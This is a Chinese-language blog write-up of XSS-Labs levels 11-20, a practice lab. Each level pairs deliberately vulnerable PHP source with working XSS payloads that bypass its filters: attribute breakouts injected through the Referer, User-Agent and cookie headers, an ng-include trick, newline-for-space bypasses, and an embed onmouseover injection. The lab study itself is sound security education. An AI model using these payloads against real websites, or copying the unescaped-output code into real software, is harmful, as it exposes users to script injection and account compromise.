Alston's blog HomeArchivesTagsCategoriesAbout
XSS-Labs挑战笔记Level11-20
|Web安全
字数总计: 1.8k|阅读时长: 8 分钟

Level 11

  • 后台源码:
<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()  
{     
confirm("完成的不错!");
 window.location.href="level12.php?keyword=good job!"; 
}
</script>
<title>欢迎来到level11</title>
</head>
<body>
<h1 align=center>欢迎来到level11</h1>
<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_SERVER['HTTP_REFERER'];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_ref"  value="'.$str33.'" type="hidden">
</form>
</center>';
?>
<center><img src=level11.png></center>
<?php 
echo "<h3 align=center>payload的长度:".strlen($str)."</h3>";
?>
</body>
</html>
  • 分析:
    • 查看页面源代码,发现多了t_ref的参数,其值是刚刚构造的level10的URL,说明后台读取了HTTP请求包的Referer,并将其写入HTML页面
      在这里插入图片描述
    • 与level10同样的过滤方式,只不过把t_sort处也编码了,但是t_ref没有被编码。所以我们使用Mantra的Modify Headers修改HTTP头,将Referer修改为Payload:
  • Payload:
"type="text" onclick="alert(1)

Level 12

  • 后台源码:
<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()  
{     
confirm("完成的不错!");
 window.location.href="level13.php?keyword=good job!"; 
}
</script>
<title>欢迎来到level12</title>
</head>
<body>
<h1 align=center>欢迎来到level12</h1>
<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_SERVER['HTTP_USER_AGENT'];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_ua"  value="'.$str33.'" type="hidden">
</form>
</center>';
?>
<center><img src=level12.png></center>
<?php 
echo "<h3 align=center>payload的长度:".strlen($str)."</h3>";
?>
</body>
</html>
  • 分析:
    • 查看页面源代码发现HTTP请求包的Agent头被作为隐藏的参数返回到了HTML页面
    • 于是类似于Level11,用Modify Headers修改HTTP头:
  • Payload:
"type="text" onclick="alert(1)

Level 13

  • 后台源码:
<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()  
{     
confirm("完成的不错!");
 window.location.href="level14.php"; 
}
</script>
<title>欢迎来到level13</title>
</head>
<body>
<h1 align=center>欢迎来到level13</h1>
<?php 
setcookie("user", "call me maybe?", time()+3600);
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_COOKIE["user"];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_cook"  value="'.$str33.'" type="hidden">
</form>
</center>';
?>
<center><img src=level13.png></center>
<?php 
echo "<h3 align=center>payload的长度:".strlen($str)."</h3>";
?>
</body>
</html>
  • 分析:
    • 查看页面源代码发现四个隐藏的参数,测试发现提交的t_sort和t_cook会显示在页面中
    • t_sort是提交的参数,进行了编码回显;t_cook是后台源码设置的cookie,将单引号替换为空,没有进行编码。
    • 所以,我们用Burp Suit抓包修改cookie值,闭合双引号,显示input标签,利用onclick事件弹框。
  • Payload:
"type="text" onclick="alert(1)

Level 14

  • 分析:
    • 本关属于exif XSS,上传一个含有xss代码的图片触发xss。
    • 详情关注先知社区

Level 15

  • 后台源码:
<html ng-app>
<head>
        <meta charset="utf-8">
        <script src="angular.min.js"></script>
<script>
window.alert = function()  
{     
confirm("完成的不错!");
 window.location.href="level16.php?keyword=test"; 
}
</script>
<title>欢迎来到level15</title>
</head>
<h1 align=center>欢迎来到第15关,自己想个办法走出去吧!</h1>
<p align=center><img src=level15.png></p>
<?php 
ini_set("display_errors", 0);
$str = $_GET["src"];
echo '<body><span class="ng-include:'.htmlspecialchars($str).'"></span></body>';
?>

  • 分析:

    • 这里AngularJS ng-include 指令:
      • ng-include 指令用于包含外部的 HTML 文件,包含的内容将作为指定元素的子节点。
      • 默认情况下,包含的文件需要包含在同一个域名下。
    • 源代码包含js的地址不可用,我们将源代码中的angular.min.js改为下述地址: 
      https://cdn.staticfile.org/angular.js/1.4.6/angular.min.js
    • 调用level1的代码,注意payload需要用但引号包裹

  • Payload:

src='level1.php?name=test<img src=1 onerror=alert(1)>'

Level 16

  • 后台源码:
<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()  
{     
confirm("完成的不错!");
 window.location.href="level17.php?arg01=a&arg02=b"; 
}
</script>
<title>欢迎来到level16</title>
</head>
<body>
<h1 align=center>欢迎来到level16</h1>
<?php 
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","&nbsp;",$str);
$str3=str_replace(" ","&nbsp;",$str2);
$str4=str_replace("/","&nbsp;",$str3);
$str5=str_replace("	","&nbsp;",$str4);
echo "<center>".$str5."</center>";
?>
<center><img src=level16.png></center>
<?php 
echo "<h3 align=center>payload的长度:".strlen($str5)."</h3>";
?>
</body>
</html>

  • 分析:

    • 过滤了script、空格、/
    • 换行符%0a取代空格,在html中同样可以运行

  • Payload:

<img%0asrc="1.jpg"%0aonerror="alert(1)">

Level 17

  • 后台源码:
<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()  
{     
confirm("完成的不错!"); 
}
</script>
<title>欢迎来到level17</title>
</head>
<body>
<h1 align=center>欢迎来到level17</h1>
<?php
ini_set("display_errors", 0);
echo "<embed src=xsf01.swf?".htmlspecialchars($_GET["arg01"])."=".htmlspecialchars($_GET["arg02"])." width=100% heigth=100%>";
?>
<h2 align=center>成功后,<a href=level18.php?arg01=a&arg02=b>点我进入下一关</a></h2>
</body>
</html>
  • Payload:
arg01=a&arg02=b onmouseover=alert(1)
  • 分析:
    • 输出点在arg01和arg02上,输出编码了特殊字符,所以只能用on事件来触发
    • 因为在embed标签中,src的属性值没有引号,所以在输入arg02时在b之后加一个空格,浏览器到b就停止判断,给src加上双引号;而将onmouseover看作另外一个属性
    • 而如果在后台源码中将src属性用引号扩起来,浏览器就会将b onmouseover=alert(1)全部看作arg02的值:
    #后台源码
    echo "<embed src='xsf01.swf?".htmlspecialchars($_GET["arg01"])."=".htmlspecialchars($_GET["arg02"])."' width=100% heigth=100%>";

Level 18

  • 跟level17一样??

Level 19、20

  • 属于Flash XSS,暂且不做分析
文章作者: Alston
文章链接: https://lizitong67.github.io/2020/02/21/XSS-Labs%E6%8C%91%E6%88%98%E7%AC%94%E8%AE%B0Level11-20/
版权声明: 本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Alston's blog
Web安全